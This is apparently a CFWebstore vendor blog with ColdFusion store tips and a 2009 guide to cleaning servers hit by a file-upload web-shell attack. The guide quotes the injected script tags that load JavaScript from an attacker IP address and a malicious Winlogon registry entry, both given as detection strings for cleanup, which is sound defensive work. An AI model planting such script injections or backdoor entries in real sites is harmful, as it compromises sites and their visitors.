CFWebstore Blog

Quick Fix for USPS Shipping Rates Problem

Mon, 03 Jan 2011 19:42:00-0400

Those of you using USPS rates may have noticed they broke sometime around Jan. 2. Apparently when USPS rolled out some price changes for the new year, which also typically includes a bunch of changes to the shipping service names, they included registration/trademark symbols in the API responses, which aren't supposed to be there. So shopping carts like CFWebstore that use these to determine which rates to show (since they still don't provide a unique key for each service, DUMB!) aren't able to properly match due to these extra characters. They are supposed to have it fixed later today, but in the meantime, here's the fix to strip those characters out. Add these two lines of code *after* the line for v.ServiceName that is around line 374 of uspostal.cfc, and this should fix the problem.


v.ServiceName = Replace(v.ServiceName, "<sup>&reg;</sup>", "");
v.ServiceName = Replace(v.ServiceName, "<sup>&trade;</sup>", "");

Please note that due to the typical changes to their available services, you may need to update some of the methods in your USPS settings, to match the new names. We do plan to roll out an update for USPS shipping sometime later this year that will no longer use the service names for determining which services are used. While USPS does not provide a unique key for each one, there are only a couple of services that share an ID, so it's felt that to save having to deal with such issues every year, it's preferable to just not have those extra services available. Hopefully at some point USPS will get around to fixing this major issue with their API so we can more easily work with it.

ColdFusion Tools and Resources

Mon, 23 Aug 2010 20:43:00-0400

Been a while since I posted anything to the blog, so thought I'd pass on some useful links and tools I've been using recently. The first is the awesome CF411 site maintained by Charlie Arehart. This is a compendium of links to all kinds of ColdFusion tools, blogs, articles, tutorials, just about anything you might need if you are a ColdFusion developer (or if you just dabble). It's a HUGE resource that everyone that works with CF should have bookmarked. CFQuickDocs is a really nice online ColdFusion documentation reference done using Ajax. Much faster and easier to pull up tag and function reference and easily swap the CF versions as well. Local Raleigh CF'er Jim Priest gave a presentation at CFUnited on automation for the CF developer. Included many of the tools and tips that I use myself such as Find and Run Robot, AutoHotKey, LastPass, Lazarus, etc. Check it out here. If you do any development work for clients, learning to use source control is something you should look into. There are a variety of excellent hosting companies that offer SVN and/or Git hosting, Codesion. is one that is very popular and that I use myself. Recently someone pointed me to another option, Unfuddle which not only hosts your repositories, but provides some really top-notch project management and ticket tracking as well, all for very reasonable prices. Finally, recently I was having a major problem debugging a Flex remoting issue. I ended up solving it by using an HTTP debugging proxy tool. It occurred to me that this may be a really useful tool for many CFWebstore developers as well, if you work with any portions of the code that interact with external servers, like shipping or payment gateways. Basically an HTTP proxy can show you all the data passing back and forth and greatly assists when trying to determine where a problem might be occurring. My favorite proxy tool is Charles which has excellent capabilities and a really nice clean interface, but it does cost $50 to purchase. Under the free category, you'll find Fiddler which is a free proxy done by Microsoft that is fairly widely used and has many plugins available as well. Well, that's about all I have. Feel free to post your favorite tools in the comments (spam will be removed!)

MySQL Null Null Error

Thu, 25 Mar 2010 16:10:00-0400

Not long ago I got an email from a customer having a strange problem with his store. Whenever someone checked a box to remove an item from the shopping cart, the store would throw an error. Reviewing the error dump showed a strange null null error. We've seen this in ColdFusion for some time but in the past, they are usually not very reproducible unless there's an error in the code causing a null value. On review though, we could not find anything causing it, the code and all queries involved didn't show any null values anywhere. We did a fair amount of detective work trying to find the cause, and I tried multiple ways to code around it, but the best I could achieve was to reduce the frequency that the error occurred. There was simply no way to do the function without that update being in there at some point and the database continued to routinely dump a null error when it got to it. We updated ColdFusion to version 9 to see if that helped, and tried a different MySQL connector as well, with no luck. Finally, we decided to upgrade the MySQL to the latest version. It was already on a fairly recent release, but there didn't seem to be any other possible cause for it. And bingo, the error is gone! We're not sure exactly what MySQL was having an issue with, but it does seem this recalculation error is due to some bug in MySQL. So if you run across this error, try updating the MySQL version and that should take care of it. We have seen the error in a couple different 5.1.3x versions and it does not seem to occur in 5.1.4x.

FCKEditor 2010 Bug

Wed, 27 Jan 2010 12:27:00-0400

If you update to the latest version of the Firefox browser, you may find the WYSIWYG editor in your store will disappear. This is due to a bug in the FCKEditor that is used for this component, it has a browser compatibility check that only goes up to the year 2009! Here's information on how to correct this if you are effected. You'll find the editor in the customtags/fckeditor directory of your store. FCKEditor Year 2010 Bug

New Facebook Fan Page

Fri, 22 Jan 2010 15:01:00-0400

I've had a number of requests to create a Facebook Fan page for CFWebstore, so here you go! I'll be posting from time to time there with important updates, news, blog posts, etc. so a great way for you Facebook users to stay informed on the latest CFWebstore news and to network with other users as well. So here's link, looking forward to seeing lots of fans on there soon! CFWebstore Facebook Fan Page

Server Speed Comparisons

Thu, 29 Oct 2009 18:32:00-0400

Readers of this blog know I've been a big fan of the Railo open source CFML server engine. Open BlueDragon also continues to improve and has good support from the community. Now we have the new ColdFusion 9 release from Adobe as well to be excited about! I particularly love the new ORM/Hibernate features. It will be sometime before many of these new features make their way into CFWebstore (since the product will continue to support older CF versions for sometime) but there's one new feature of CF9 you can take advantage of now...speed! One thing that has impressed me so much with Railo was how much faster it ran sites versus CF8 and OBD. CF9 has definitely closed the gap in areas, particularly with object creation. We are seeing some very basic speed comparison tests posted to various ColdFusion blogs which you may find interesting, if you are look to migrate to one of these servers. Unoffical Speed Test CFC Creation Time Object Creation Test On another note, did you know there is a host offering Railo hosting? Check it out! Alurium.com Vivio Technologies also offer both Railo and Open BlueDragon as options on their Linux VPS plans. If you are up for running your own server, this is one of the cheapest options and gives you great performance that blows shared hosting out of the water! Vivio Technologies

Other ColdFusion File Upload Attacks

Mon, 21 Sep 2009 21:30:00-0400

We're continuing to see malware injection attacks against ColdFusion sites. The latest attack used the public upload in the popular Galleon software. Read the details here: How Galleon Was Hacked It appears to be the same user(s) as the ones that have attacked CFWebstore and FCKEditor installations, so they clearly are continuing to shift tactics in order to infect ColdFusion sites in new ways, and also change the file names they use to upload to sites, so be sure to check for *any* sites that have upload features that the hackers could make use of.

Using Google Analytics

Thu, 27 Aug 2009 19:19:00-0400

Google Analytics is a very popular service many merchants use to do tracking on their sites. Typically this involves inserting a small amount of javascript into your site. This is very easily accomplished with CFWebstore by pasting the code into your layout page (such as layouts/lay_default.cfm). What you may find though is that you get an error during checkout due to the code not using an https: link. Switching the code to use strictly the https link will often work, but here is a more elegant solution. Use this javascript instead to switch between the http: and https: links (modify the link as needed for whatever analytic service you are using):

Now your site won't throw any errors!

Redirecting Multiple Domains to One

Tue, 28 Jul 2009 12:19:00-0400

It's common these days to have multiple domain pointers to a website. I might for instance have cfwebstore.com, cfwebstore.net, dogpatchsoftware.com, etc. all pointing to my site. Things become a bit problematic when using ecommerce software and you need to use SSL to check out. CFWebstore has a variety of security measures that rely on the SSL having the same domain name as the primary site. So what we need to do is redirect the user to the same domain regardless of what domain alias they may have entered the site on. Now, it's fairly easy to just detect these and redirect the user back to the main home page on your primary domain. But what if you have users coming into various sub-pages on the site and want to just transparently rewrite the URL? Well, this is easily done using existing variables in CFWebstore. The file you will want to add your code to is fbx_Settings.cfm. Go to around line 293, just before the clearsession section, and add something like this (add a cfcase for each domain you wish to redirect):

There are certainly other ways to do this, but due to the varying types of URLs that CFWebstore creates according to your store settings, this will work for any store regardless of setup.

Details on Dealing with the File Upload Hack

Fri, 03 Jul 2009 15:32:00-0400

Here are some detailed instructions on repairing your site if it's been hit by the hack that is targeted at older CFWebstore installations. This is compiled from information on the CFWebstore Yahoogroup, I wanted to be cautious about posting it to the public blog as I didn't want to expose information that would invite attacks from othe hackers, but since that information is now fairly easily available, there's no reason to not provide this, particularly since the list is quite busy and it can be a bit time-consuming to find all the information. Feel free to provide any feedback on this based on your own experiences. Basically the hack is making use of an old upload file that would exist on version 5 and older version 6 sites. It might also be found on any recent sites that had been upgraded, but had not removed unused files, but version 6.41 sites are not known to be vulnerable to the attack regardless of the file(s) existence. The hackers may also use other venues to attack, there are reports of some FCKEditor and CKEditor installs having similar vulnerabilities as well as CF8 (cftextarea which uses FCKEditor). So be on the lookout for *any* upload function on your servers as a possible entry point. In the event that your site was compromised, here are steps to take in order to return to working order. Please note that hackers commonly change tactics and this may not exactly match what you find on your server, there may be differences in the nature of the attack, where it comes from, file names, etc. This is intended to be just a starting point to go from. What these hackers do is upload a ColdFusion page (typically index.cfm or image.cfm) with a shell interface to take complete control over your web server. They can browse your file system, upload, view and edit files, add users and services, etc. (It is a ColdFusion variant of the C99 shell script, a somewhat notorious piece of PHP malware). The hardest part of these current hacks is that the hackers may use this file to do different things on different servers. Typically, you can tell you've been hacked by a script being injected into the bottom of all your pages. So, here's some suggestions on what to do if you've been attacked. First, if you have a backup of your entire server (operating system and all) then do a database backup and restore your system back to before the attack. You can then restore your database information. Skip to step 3 to prevent hackers from coming back. If you do not have a backup, you'll need to clean up your sites and server. Here are the steps:

Turn off your web sites or put a temporary splash page up before Google has time to identify your site as dangerous. Google is surprisingly fast at finding compromised web pages and visitors may start seeing a warning page when coming to your site. If this happens, you can submit your site to Google Webmaster Tools to be re-evaluated. However it will save time and energy (and protect your site visitors) if you simply turn your site off ASAP.
Clean up the injected code. The hacker inserts 2 different lines of script into your site, one for web pages, and one for javascript files. The hacker does a search and replace on the entire server, not just the web folders. It is best to do a search and replace from your server's desktop A popular app to use for this is jReplace. Do a search and replace for the two different script injections (these may change so be sure to match whatever gets injected on your own sites):
- First, open the Application.cfm of any site. At the bottom you'll see a line of code like (this is going to vary depending on your site and what they inject on it, so adjust accordingly):
  
  <scRipT src= http://203.251.202.94/iis7.0.js ></sCrIpt >
  
  Use jReplace to replace this code
  Directory: c:\
  File types: htm,html,asp,php,cfm
  Search for: (the script you found above)
  Replace with: (leave field blank)
  
  Be patient, this will take awhile to run. You will know it is done when you see the log entries.
- Next open any .js file in a web site. At the bottom you'll find a line of code like:
  
  document.writeln ("<script src=\"http:// 203.251.202.94/iis7.0. js\"><\/script>") ;
  
  Copy and replace entire line as above
  Directory: c:\
  File types: js,JS
Remove the initial attack files. Typically, you will see an index.cfm and/or image.cfm in the images/accounts folder. You often will find files elsewhere (includes/mxajax is another popular location for them), so you may want to compare with a clean install of the software to find stray files. MOST IMPORTANTLY, go to the customtags directory and delete any cfm file that starts with the word 'upload' (there may be 2 or 3). You can also delete the Application.cfm template from the customtags directory as well. If you are on a version 5 store, you may need to modify the users/dsp_account_form.cfm page as well to not include a call to this page (under logo), it's not a commonly used file, and you can just comment the entire setting on that page that uses it without needing to change any code elsewhere.
If you are using Coldfusion 8, it is very possible that the hackers may be using the version of FCKEditor built into ColdFusion to upload the file. If you have cleaned and patched a webstore site, and the files all show up again, this is commonly how they are doing it. Although it is possible to turn off the upload feature, the safest thing to do is to delete the entire filemanager directory found under "CFIDE\scripts\ajax\FCKeditor\editor". Coldfusion updates may put those files back, so be sure to keep that in mind. Be sure to also check your servers for any other upload functions, or other installs of FCKEditor and make sure they are updated and/or patched against a similar exploit.
Clean off any other recently modified or new files that the hacker(s) may have placed on your sites. Typically we've seen them try to add index.cm files, but you may see them add or modify other files elsewhere on the server. For instance, there was one report of them adding an upload form to the fckeditor.cfm or fckeditor.asp file that will only show when a parameter is passed to it, allowing them access to continue to place files on the server at whim. It is crucial that you find ANY files they might have added, or they can continue to get onto the server.
As an additional precaution, you can make an additional change you can make on your Application.cfm page, that will help prevent them from running index.cfm or other .cfm files from subdirectories. See the blog entry on this here. Please note, this will not prevent them from continuing to attack if they have modified any legal files in the application, or have access to the CF8 exploit, so it's critical to take care of these issues as well.
After cleaning your site(s) take a minute and zip it up as a backup. This will make it easier to just restore should you have missed anything and the hackers get back on.
Now it's time to turn to the server. Typically, the most issues we have seen is with Enterprise servers that have JSP and/or cfregistry/cfexecute enabled. That allows the hacker(s) to do a wide variety of actions, from creating new user accounts, automatically sending them server passwords, installing viruses and malware, and any other amount of mischief. If these kinds of things have happened to your server, you may be best off just rebuilding from scratch, using a backup copy of your websites, database, ssl keys, etc. If you want to try and fix it, here are some suggestions to try:
- Do a search (including hidden and system files) on your server for any file with the word 'seraph' in it. Typically you'll find the original shell file in other locations, such as windows/help.
- Scan for viruses. It seems the trojans the hackers installed are not well found by many scanners, some users have reported the ESET anti-virus to be more effective at finding them. Some have reported upwards of 50 viruses being found, others not finding any. One commonly found trojan is this backdoor trojan (info from Symantec). This Trojan "calls home" periodically and gets a binary file which it downloads to the Windows temp folder. The binary has a random name. This binary file executes and deletes the web log files, disables logging on web sites, and adds the script tags to your pages. The information on the semantic site will let you know what you need to remove.
- Typically you will also find a registry key that lets the hackers run a service to send them your admin passwords when using remote desktop. Typically this is named something like "wminotify" but may be found under another name. A typical entry might look like this:
  
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wminotify] "DllName"="wminotify.dll" "Asynchronous"=dword:00000001 "Impersonate"=dword:00000000 "Startup"="EventStartup"
  
  Be sure to also delete the DLL that it refers to, which will be found in the windows/system32 directory. This writes a Boot.dat and Boot.bat in c:\windows\system32 that exposes passwords ? delete these files as well.
- Check for any files that may have been added or modified, particularly in your windows system directory and dated at the time of the original attack. One user reports these files modified and quarantining them stopped continued infections: wpa.dbl, PerfStringBackup.INI, perfh009.dat and perfc009.dat. deploykt.dll was another file found to be suspicious.
- Any number of other changes on the server may have been made. Here are some things to look out for:
  - Installation of a service called "microsoft .net framework tpm" (no such service) that hooks your svchost.exe (and associated registry entries). You need to find the associated process (command line tasklist /svc) that is using that service and stop it. Then delete the service (command line: sc delete actual_service_name). Reboot server.
  - Adsutil.vbs and gethashes.exe in c:\ (shouldn't be there).
  - New user created and assigned Admin privledges.
  - New user directory c:\documents and settings\new_user (replace with actual name)
  - All Users directory in c:\documents and settings\all users has cmd.exe (shouldn't be there)
  - Existence of malicious code in: C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files\root\some_number
  - IIS Settings to disable logging (need to be re-enabled).
  - Addition of JSP files in attacked website root with malicious code.
  - Addition of boot.aspx or boot.cfm in attacked website root with malicious code. (probably sets up the hack).
- Other users have reported a variety of files in the windows system folder that seem to have been modified or added at the time the site was infected, so be sure to look for any suspicious files.
- Once you are successful in restoring your server and patching the vulnerabilities, be sure to change all your passwords, as a precaution against any areas that the hackers may have gained access to.
- Be sure to also lock ColdFusion down. Disable JSP handling unless you absolutely need it (follow Adobe instructions here) and ideally set up ColdFusion to run under a restricted user account that has no access to windows directories (with the exception of windows/fonts for cfdocument support). You may want to try and block the IP addresses of the attackers if you don't need to allow access to foreign countries like China. Ideally have any users on CFWebstore upgrade when possible to the latest version which has much better security against this, and other types, of attacks.

Hope this is useful, if you need additional help, drop by the yahoogroup for more detailed discussions on exactly what steps people are taking, and any changes we have seen in the attack methods the hackers are using. And if you are having problems getting running again, feel free to contact CFWebstore support for assistance.

A Code Snippet to Help Protect Against Attacks

Tue, 30 Jun 2009 18:24:00-0400

Here's an easy code modification that is a nice security addition for sites, particularly older stores, and will help somewhat against the recent attacks. Please note that this is far from a comprehensive fix and depending on the level of access the hackers gained, may not help if you have already been attacked. See the links below for more detailed information on dealing with attacked sites for comprehensive details on cleaning up sites. Version 6 contains a lot of additional coding to protect against XSS, SQL injection, session spoofing and other attacks, that makes it considerably harder to attack, and it is STRONGLY recommended that you upgrade to the latest release if at all possible. If you are running an older version, there's a greater chance that a hacker can get access to secure areas of your store and once they get in there, they have access to a lot of things that could compromise your site. Be sure to use strong passwords, change your username regularly, use SFTP if possible, etc. to keep your site secure, but this code helps ensure that they can't upload and hide a CFM file and run it on your server from a hidden subdirectory. In the Application.cfm file, replace this section of code (the exact file list may differ depending on your version):

with this code:

Please note, if your store is not in your webroot directory, be sure to include the path to the store in the cflocation (such as url="/store/index.cfm"). Also depending on your version, the list of files allowed may be slightly different than these, so adjust as necessary.

Latest Hack Attempts

Thu, 25 Jun 2009 10:35:00-0400

More details have come out about the latest attack, this is a new one that is quite insidious. If you have a recent install you would not be vulnerable (although upgrading to the latest release is still recommended), but any store more than a year old or more may need quick patching. Contact me directly or visit the CFWebstore email list for more details on how to patch your specific version and tips on other things you can do to keep sites secure.

New Rash of Attacks Against ColdFusion

Mon, 22 Jun 2009 07:51:00-0400

It seems the hackers are making the rounds against ColdFusion sites again so if you are using an older CFWebstore version be aware that you may be vulnerable. I've posted about some of the issues in the past and included some code that can at least provide some level of protection. If you've not considered upgrading before, now might be the time, as only by staying current with new releases can you be sure to have the most secure and hacker-proof store. Read the previous entry here:
Some Important CFWebstore Issues

Using Anchor Links with CFWebstore

Thu, 26 Mar 2009 14:16:00-0400

Here's a topic that came up on the email list this week. It definitely trips a lot of people up, so I thought it'd be worth putting on the blog for others that might run up against it. In order to do the search-engine-safe URLs, CFWebstore puts a Base Href into the page. However, if you want to use anchor links on a page, these often are thrown off by the Base Href and won't work as a result. CFWebstore helps out by also providing a variable that is automatically set to the URL of the page you are on: Request.CurrentURL. You can use this in the code anytime you need to create links referring to the current page. In the case of the anchors, we need to make sure the anchor links have this URL inserted in front of them. If you are using the anchors somewhere in the code, you can just insert this variable in front of them. But what if you want to create something like a table of contents instead the content of a page? Since we can't use ColdFusion variables inside the page content (see related content below for more information on this) we just need to update the code that outputs the page content and have it insert the URL for us. The page content is output by the custometags/put_text.cfm file. So we just need to insert this line of code around line 37 of this file: Now all the anchor links will have the full URL on them.

Upcoming Releases

Tue, 03 Mar 2009 13:30:00-0400

My next release kept growing and I have been getting so many good ideas for some nice features to add to it, that I decided it would be best to split it up and release some of the changes as soon as possible, so you will have them sooner rather than later, and then do the bigger release, with all the additional database changes and new features a little later this year, hopefully still by the end of Spring, depending on how much I decide to include in it. So you'll be seeing a version 6 update within the next week with some of the more important updates, and then version 7 later this year. Of particular note is that this update will not allow any storing of credit card data at all out-of-the-box. I looked at trying to improve the encryption and other security measures to allow this...but there is so much more required under PCI Compliance regulations that I can't handle at a software level, and from my past experience, I know most people won't bother to do, putting both their customers and themselves at risk, so it really is not something I can leave as an option in the software. So if you have need to be able to do additional transactions on credit cards (including recurring billing for memberships) you will need to use a processor like Shift4 that uses tokens instead of storing card data. I may look at using recurring billing APIs such as Authorize.Net has in the future...but these APIs do not offer as much flexibility and many features would not work with them, so it's a bit harder to support them. If you have questions or concerns with updating to the new release and how this will effect your own store, please feel free to contact me.